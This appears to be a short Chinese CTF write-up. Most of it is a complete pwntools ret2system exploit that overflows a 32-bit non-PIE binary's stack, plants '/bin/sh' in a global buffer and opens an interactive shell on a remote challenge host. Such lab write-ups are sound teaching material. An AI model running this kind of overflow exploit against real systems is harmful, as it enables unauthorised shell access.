image-20231108093812843

image-20231108093824738

第一次 read 把输入写到全局 buf（exp 中取 0x804A080，0x804xxxx 这种固定地址说明二进制没有开 PIE），所以只要把 shell 命令字符串写进去，就有了一个已知地址可以当作 system 的参数。注意 exp 里写的是相对路径 bin/sh，system 只有在目标进程 cwd 为 / 时才能解析到它；用绝对路径 /bin/sh 更稳（前提是第一次 read 至少能读 8 个字节）。

exp

from pwn import *
from LibcSearcher import *
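# Target settings: 32-bit Linux binary, so p32() packing and a 4-byte saved
# ebp apply in the payload below. debug logging shows every byte exchanged.
context(
    terminal=["wt.exe", "wsl"],
    os="linux",
    arch="i386",
    log_level="debug",
)
elf = ELF("./pwn")
# Run as `python exp.py LOCAL` to attach to a local copy of the binary instead
# of the remote instance; pwntools exposes KEY=VALUE command-line flags via
# `args`, and an unset flag is falsy, so the default stays the remote target.
io = process("./pwn") if args.LOCAL else remote("node5.anna.nssctf.cn", 28863)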
def debug():
    """Attach gdb to the live target tube and block until the user resumes.

    Relies on the module-level `io` tube; call it before sending the payload
    so breakpoints can be placed on the vulnerable read.
    """
    target = io
    gdb.attach(target)
    pause()
#debug()
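# Stack layout at the vulnerable return: 0x1C bytes of local buffer, then the
# saved ebp (4 bytes), then the return address we overwrite.
offset = 0x1C + 0x4
# Global buffer the first read() fills. The address is fixed (0x804xxxx, so
# the binary is presumably non-PIE); the string planted there becomes
# system()'s argument.
buf_addr = 0x804A080
# For an imported function pwntools resolves the symbol to its PLT stub.
sys_addr = elf.sym['system']
# ret2system frame: system's address, a dummy return address (0 — the shell is
# all we need, the crash after it exits is irrelevant), then the argument.
payload = cyclic(offset) + p32(sys_addr) + p32(0) + p32(buf_addr)
# First read: plant the command string. The original sent the relative path
# b'bin/sh', which system() only resolves when the target's cwd is /; the
# absolute path works from any directory (assumes the read accepts >= 8
# bytes — TODO confirm against the binary). sendline appends '\n', which sh
# treats as a harmless command terminator. Bytes, not str, avoid pwntools'
# BytesWarning on newer versions.
io.sendlineafter(b'name\n', b'/bin/sh')
# Second read: the overflow itself.
io.sendlineafter(b'time~\n', payload)
io.interactive()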